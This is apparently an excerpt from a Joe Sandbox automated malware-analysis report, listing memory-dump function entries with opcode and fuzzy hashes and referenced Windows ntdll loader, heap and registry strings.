                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: 904377dc2d194a0bf09991104d099eded8a905ddceaca631bc7e6241a0761c5d
                                                                                  • Instruction ID: c7c1ce3fedc8c2db56ccb9c76a5dbdfab08994a30a7629e703468f579548ff61
                                                                                  • Opcode Fuzzy Hash: 904377dc2d194a0bf09991104d099eded8a905ddceaca631bc7e6241a0761c5d
                                                                                  • Instruction Fuzzy Hash: 6E310572A14201ABDB20DF59D84AE7E7FB5FB84710F154929FC116B241DFB4AC81EB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 3a7f74db16611a01d50abe744069be4a184fb8b030876bb0ba57709561c1915b
                                                                                  • Instruction ID: 24c531158698a43237a58d9102b9a48301d2f73a0188fa4b7276186a0f908e41
                                                                                  • Opcode Fuzzy Hash: 3a7f74db16611a01d50abe744069be4a184fb8b030876bb0ba57709561c1915b
                                                                                  • Instruction Fuzzy Hash: 07F18A71B04605DFDB15CF68C888F7AB7B6FF84310F144268E8169B391E774A981EB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: 9e67a4c0e2a34d88e8c92c56339a8346780ef7be759b46875e759589cb2fa9af
                                                                                  • Instruction ID: 7942bddfa393183a785eb4f3de7f1c186b37c1f6018816a3ca9e958a94912c4e
                                                                                  • Opcode Fuzzy Hash: 9e67a4c0e2a34d88e8c92c56339a8346780ef7be759b46875e759589cb2fa9af
                                                                                  • Instruction Fuzzy Hash: 09C25B726083419FDB29CF24C885BABBBE6FFC8754F04892DF98987251D734D844AB52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: 766a6b909bac39b9345faf86a7909f796afb717a5c9b7d5725df56f80b36f006
                                                                                  • Instruction ID: 97049b6472c21b5bf7f13bb97c5736fe4dfaceac8ed0b4aec12373359d2fb29c
                                                                                  • Opcode Fuzzy Hash: 766a6b909bac39b9345faf86a7909f796afb717a5c9b7d5725df56f80b36f006
                                                                                  • Instruction Fuzzy Hash: 0AA18B71A016289BDF26DF24DC8DBAAB7B8FF44710F0001E9E909A7250E7359E84DF50
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0573CD34
                                                                                  • InstallLanguageFallback, xrefs: 0573CD7F
                                                                                  • @, xrefs: 0573CD63
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1757540487
                                                                                  • Opcode ID: a7e4cbc4452694410f986315b5b282c9de2b615c2ca8d498b24996995279c49f
                                                                                  • Instruction ID: 352789c77b59fbb3f0500fa484d3d414070fc907c897161bfe73bbed0bb0257b
                                                                                  • Opcode Fuzzy Hash: a7e4cbc4452694410f986315b5b282c9de2b615c2ca8d498b24996995279c49f
                                                                                  • Instruction Fuzzy Hash: DC5126B65183519BCB15DF68D448ABBB3E8BF88714F00092EF986E7210E734DD04E7A2
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057B82E8
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 057B82DE
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 057B82D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 386afe5c571db786dc2f81d85e339c727c7a006e4475afafb3fea7c04a82496d
                                                                                  • Instruction ID: 4cac9caa41d600f6b0db7747ad4c89748347a1f3d2d9ff034cdbab504624b44a
                                                                                  • Opcode Fuzzy Hash: 386afe5c571db786dc2f81d85e339c727c7a006e4475afafb3fea7c04a82496d
                                                                                  • Instruction Fuzzy Hash: 6641C471658304ABDB21EB64E94AF5B7BE8AF48750F00492AFD55D7250EBB0E800AB91
                                                                                  Strings
                                                                                  • @, xrefs: 057FC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 057FC1C5
                                                                                  • PreferredUILanguages, xrefs: 057FC212
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: f49f7d9d6d458640f46a11fdabe170954103e0820b0f4b6bdb6857ac4a8687a4
                                                                                  • Instruction ID: 2675d2ace594b53736531794ba5c3914b1fc9b600077dc1d5bb193e7cbc2d457
                                                                                  • Opcode Fuzzy Hash: f49f7d9d6d458640f46a11fdabe170954103e0820b0f4b6bdb6857ac4a8687a4
                                                                                  • Instruction Fuzzy Hash: D2417E72E0420DEBDB12DAD8C885FEEB7BDFB08710F14406AEA05A7280D7749E44AB50
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 057C488F
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 057C4888
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 057C4899
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 0615fb837435b16b6a71bfddd1d4c5c5f42ca06ee7192e0e37bc8ea170e28a32
                                                                                  • Instruction ID: de05cc11c044322d63071f5343e60ff041faa41721f3000d87dd07227f060a6d
                                                                                  • Opcode Fuzzy Hash: 0615fb837435b16b6a71bfddd1d4c5c5f42ca06ee7192e0e37bc8ea170e28a32
                                                                                  • Instruction Fuzzy Hash: E3419E32A186509FCF21CE68D864A267FE7FF49B52F0506ADEC49D7211D730E800EB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 3e41d54c9a77c4b6779cc7e41c762077c8a70762a0accae4f4853df88236aa7e
                                                                                  • Instruction ID: 7421e68fcedbdacd6b998d1b8555c169993b884dc0d6f980228bfa23c5d12fcb
                                                                                  • Opcode Fuzzy Hash: 3e41d54c9a77c4b6779cc7e41c762077c8a70762a0accae4f4853df88236aa7e
                                                                                  • Instruction Fuzzy Hash: D2410471A043988BEF25DBA5C848FADFBBAFF45350F140459D802EB791D7B59901EB20
                                                                                  Strings
                                                                                  • LdrpInitializationFailure, xrefs: 057C20FA
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057C2104
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 057C20F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 20f7ca95c069724896ce76e9f33cd23226e7aec6223252c7a85f073261fd25f4
                                                                                  • Instruction ID: ada7d4e3e8378e4161408c6eda3e723d7113349c16e2308646913b61b4d93378
                                                                                  • Opcode Fuzzy Hash: 20f7ca95c069724896ce76e9f33cd23226e7aec6223252c7a85f073261fd25f4
                                                                                  • Instruction Fuzzy Hash: B5F0A475750258ABD714EA4C8C4BFA93F68EB41B54F5004ADFA4077682D9B0E500E691
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 550e625b1cc103d4ad71ac07386604117a1995e20e1223747710d0104ffbf7ad
                                                                                  • Instruction ID: cbd5cee2a7b5c6f55f444ac423f3714dfd9d6aa2f8650f6563bc46b1fae59c6c
                                                                                  • Opcode Fuzzy Hash: 550e625b1cc103d4ad71ac07386604117a1995e20e1223747710d0104ffbf7ad
                                                                                  • Instruction Fuzzy Hash: CB718C72A002499FDB01DFA8C988FAEB7F9FF48704F140065E905E7251EA75ED41DBA0
                                                                                  APIs
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 057CCFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFilterFunc@8
                                                                                  • String ID: @
                                                                                  • API String ID: 4062629308-2766056989
                                                                                  • Opcode ID: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
                                                                                  • Instruction ID: 7def774db68fa44ea5c1940e56e953ede08836489de1e7c734147bb80fdc7add
                                                                                  • Opcode Fuzzy Hash: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
                                                                                  • Instruction Fuzzy Hash: C441BFB1A00654DFCB21DFA9C849A6DBBB8FF44710F00456EED15DB250EB74D841EBA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 1e784d0297155530d8d0fd57a6182d6f1b74c5b3b3ecafebefbcc82188cadaf5
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 42C1D1312083459BDB68CF28CC45B6BBBE6BF84318F049A2CF996CA2D0D775D905CB42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 82d9e8f9d0fee3b9e5f413e327792cc2f72d246f4ee0cbe89a7ee5b21a0a1829
                                                                                  • Instruction ID: 6f6c6f07f936b597a165e48aca6d5baf9910d2f487d8587d4b64782e944d33a7
                                                                                  • Opcode Fuzzy Hash: 82d9e8f9d0fee3b9e5f413e327792cc2f72d246f4ee0cbe89a7ee5b21a0a1829
                                                                                  • Instruction Fuzzy Hash: 42616B71E046189FEB24DFA8C844BEEBBB9FB48700F50806DE959EB351D771A900EB50
                                                                                  Strings
                                                                                  • LdrpResGetMappingSize Enter, xrefs: 0574AC6A
                                                                                  • LdrpResGetMappingSize Exit, xrefs: 0574AC7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                  • API String ID: 0-1497657909
                                                                                  • Opcode ID: f8b97caba6acaa7e11e4e7daf60bebc52c1188f9485d35358d0589e26fb0a2d9
                                                                                  • Instruction ID: 66b1ef803b62dd7d6a3c85b4cbcd278aef96bbe648cdefd9780f5504710c0379
                                                                                  • Opcode Fuzzy Hash: f8b97caba6acaa7e11e4e7daf60bebc52c1188f9485d35358d0589e26fb0a2d9
                                                                                  • Instruction Fuzzy Hash: 0261D172A486549FEB15CFA8C844BADB7B6FF48751F04056AE802EB294E774D940EF20
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 7ea0c4b408c4e5fe7b3a9d7735e81f98263269eeb32e00c3dda2bca0b03da68c
                                                                                  • Instruction ID: fc5f13f9fccb6ad310b09be5a92b3eb37166b5c94f66992c6d7e959d76501cd0
                                                                                  • Opcode Fuzzy Hash: 7ea0c4b408c4e5fe7b3a9d7735e81f98263269eeb32e00c3dda2bca0b03da68c
                                                                                  • Instruction Fuzzy Hash: D15118B1E4021DAEDF11DFA5CC88EEEBBB9FB48754F100529E911A7290E7709E05DB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$Flst
                                                                                  • API String ID: 0-758220159
                                                                                  • Opcode ID: 61b233f0427c70ef4def176433ad467cbe46d70784677340770d03d64eda4529
                                                                                  • Instruction ID: e67a21ca1b8b5967ccbafc82515f6fb9a199b976795c12cefb51fd09429e0714
                                                                                  • Opcode Fuzzy Hash: 61b233f0427c70ef4def176433ad467cbe46d70784677340770d03d64eda4529
                                                                                  • Instruction Fuzzy Hash: 30517FB1E002188FDF25CF95D448BB9FBF6FF44714F15842AD1499B250EB709A85DB80
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0574063D
                                                                                  • kLsE, xrefs: 05740540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: fa75e88c2575343da14ffdcdf35a53636b5302de29e1ee6e8e4a6bdb285551f6
                                                                                  • Instruction ID: edae58d7836f25e050fc1e38b8e1706a401548966a086334c464af64c5e809e5
                                                                                  • Opcode Fuzzy Hash: fa75e88c2575343da14ffdcdf35a53636b5302de29e1ee6e8e4a6bdb285551f6
                                                                                  • Instruction Fuzzy Hash: 6751AF716147429FC724EF6AC448AA7B7E9BF84300F00483EEAAA8B240E7709545DF92
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 057B280C
                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 057B2807
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                  • API String ID: 0-2104531740
                                                                                  • Opcode ID: 165df26e8ae83fc3e78f7f3d4dbdcb926c417d07dc2631758da3748a466be5f2
                                                                                  • Instruction ID: 495e34cffee2ad837438100600a2ec9e33a8543b401abe42243d04c63cf99e2c
                                                                                  • Opcode Fuzzy Hash: 165df26e8ae83fc3e78f7f3d4dbdcb926c417d07dc2631758da3748a466be5f2
                                                                                  • Instruction Fuzzy Hash: D541107A601205AFEB24DF55C840FAAB3A6FF94B10F20802DE9559B641E7B09C41EB94
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0574A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0574A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 62b2bd975733c1368c5c6c42d1fb735bebda8c1739e2c177515d827ef5e0bade
                                                                                  • Instruction ID: 3d44058cba274bfcacf17dde64add9d3d38a8fc13333dad994738247abd9b26f
                                                                                  • Opcode Fuzzy Hash: 62b2bd975733c1368c5c6c42d1fb735bebda8c1739e2c177515d827ef5e0bade
                                                                                  • Instruction Fuzzy Hash: 3E41DE35A48659DBCB21CF69C844B6EB7B6FF85300F2441A9E802DB6A1F375D900EF40
                                                                                  Strings
                                                                                  • @, xrefs: 05781050
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05781025
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                  • API String ID: 0-2976085014
                                                                                  • Opcode ID: 5dcdcd9444d0d2c2ea8b993812f3844a9e5c435db63ed01dd6d1b64d286fc23f
                                                                                  • Instruction ID: 7136ab820f325bc48ed3d8f8ebab10008ec06ee3fb93a55f73545134c1aeb078
                                                                                  • Opcode Fuzzy Hash: 5dcdcd9444d0d2c2ea8b993812f3844a9e5c435db63ed01dd6d1b64d286fc23f
                                                                                  • Instruction Fuzzy Hash: 04318672A40588ABDB12EF95CC88FAFBBB9EB84750F400525E511A7250DB74DD01EBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 3345c1a6d0811f15d7177f32343049a13804680f36d1fee403b7d64661b22769
                                                                                  • Instruction ID: de7d9f931894e02be76bd071506b39f6ddf2370ed511bbcc38354dbb9a307765
                                                                                  • Opcode Fuzzy Hash: 3345c1a6d0811f15d7177f32343049a13804680f36d1fee403b7d64661b22769
                                                                                  • Instruction Fuzzy Hash: 3D01F4B2254704AFE312DF18DD4AF2A77E8EB44715F018939B948C7190E734E904EB4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: 79e07faf46a6e5bf9e7663c719aaa6b4f4f63950109c8f3a631bcb2b68cfaa38
                                                                                  • Instruction ID: 3fe2b98bd21169ebe5859181a04bf443db215d1a75ef2e4abc62b58f2e9f4b3f
                                                                                  • Opcode Fuzzy Hash: 79e07faf46a6e5bf9e7663c719aaa6b4f4f63950109c8f3a631bcb2b68cfaa38
                                                                                  • Instruction Fuzzy Hash: FA826975E052189FDB25CFA9C884BEDB7B6BF48310F14816AE85AAB350D7309D81EF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PATH
                                                                                  • API String ID: 0-1036084923
                                                                                  • Opcode ID: c3a40fd3982b49168c7742f555f968710828642b0f052e053c70cd3daf99f8ba
                                                                                  • Instruction ID: 5bb0590866e9357fed107365f8c14d6ea340bedded385f2c217e16141beb1905
                                                                                  • Opcode Fuzzy Hash: c3a40fd3982b49168c7742f555f968710828642b0f052e053c70cd3daf99f8ba
                                                                                  • Instruction Fuzzy Hash: 32F1C371E14214DBCB25DF9DD885ABEBBB1FF48700F544829E849AB250EB34A881EF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: w
                                                                                  • API String ID: 0-476252946
                                                                                  • Opcode ID: 95ab823c39aec74d67856c94df691f1626a3e89db41dd0c8c229c1fac4fd7fa9
                                                                                  • Instruction ID: 59a88b321d01b1dd8a36bc4122406859c7541f4f4de5db906ff0f73b3a4adbe3
                                                                                  • Opcode Fuzzy Hash: 95ab823c39aec74d67856c94df691f1626a3e89db41dd0c8c229c1fac4fd7fa9
                                                                                  • Instruction Fuzzy Hash: 45D1CF71A04219EBCB25CF54C881ABEFBF6FF84700F548459E8999B241E335ED92E760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                  • Instruction ID: 6c44108c2edeef7ed71913607f181b8fd357bcef46060c48391e6a228523a98e
                                                                                  • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                  • Instruction Fuzzy Hash: A5A14CB1E0131AAFDF15DFA8C884EBEB7BAFF48740F184429E911A7251E7749940DB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: af6762673ede287494ed47d7cde92f0730f4c09602965223a61351d731cda431
                                                                                  • Instruction ID: 929f65084f7ae930ec14f80118250fcb4e457bb58f125c0825487dc4d46c4041
                                                                                  • Opcode Fuzzy Hash: af6762673ede287494ed47d7cde92f0730f4c09602965223a61351d731cda431
                                                                                  • Instruction Fuzzy Hash: E2916371A40219AFDB21DF99CD89FAEBBB9EF04750F200469F601BB191D774AD04DB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: b9b7d77534e21355eaaef94a48d7454b960273118f87bdc49ab80fddc9674fa6
                                                                                  • Instruction ID: 7d3413067db10d6e609a65e99c6603ccd9fcac8d8c78fdef6add352c99ec2309
                                                                                  • Opcode Fuzzy Hash: b9b7d77534e21355eaaef94a48d7454b960273118f87bdc49ab80fddc9674fa6
                                                                                  • Instruction Fuzzy Hash: 47718175E04219DFEF28CF98D590BEDBBB2BF48710F14812EE906A7240E7B19941EB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 3f091d3fb58d76634606ae961aecac5dca433a5bafd2c4d94c73248aee1201e3
                                                                                  • Instruction ID: 7a30d0985a8e2730f3eef0af214c1bec2f18520d9cd8c6a7a9ef672e86b1ebec
                                                                                  • Opcode Fuzzy Hash: 3f091d3fb58d76634606ae961aecac5dca433a5bafd2c4d94c73248aee1201e3
                                                                                  • Instruction Fuzzy Hash: 605180B2E043299BCF15DF99D848AAEB7B6BF08A10F054129E911BB340D7759C01EFA4
                                                                                  Strings
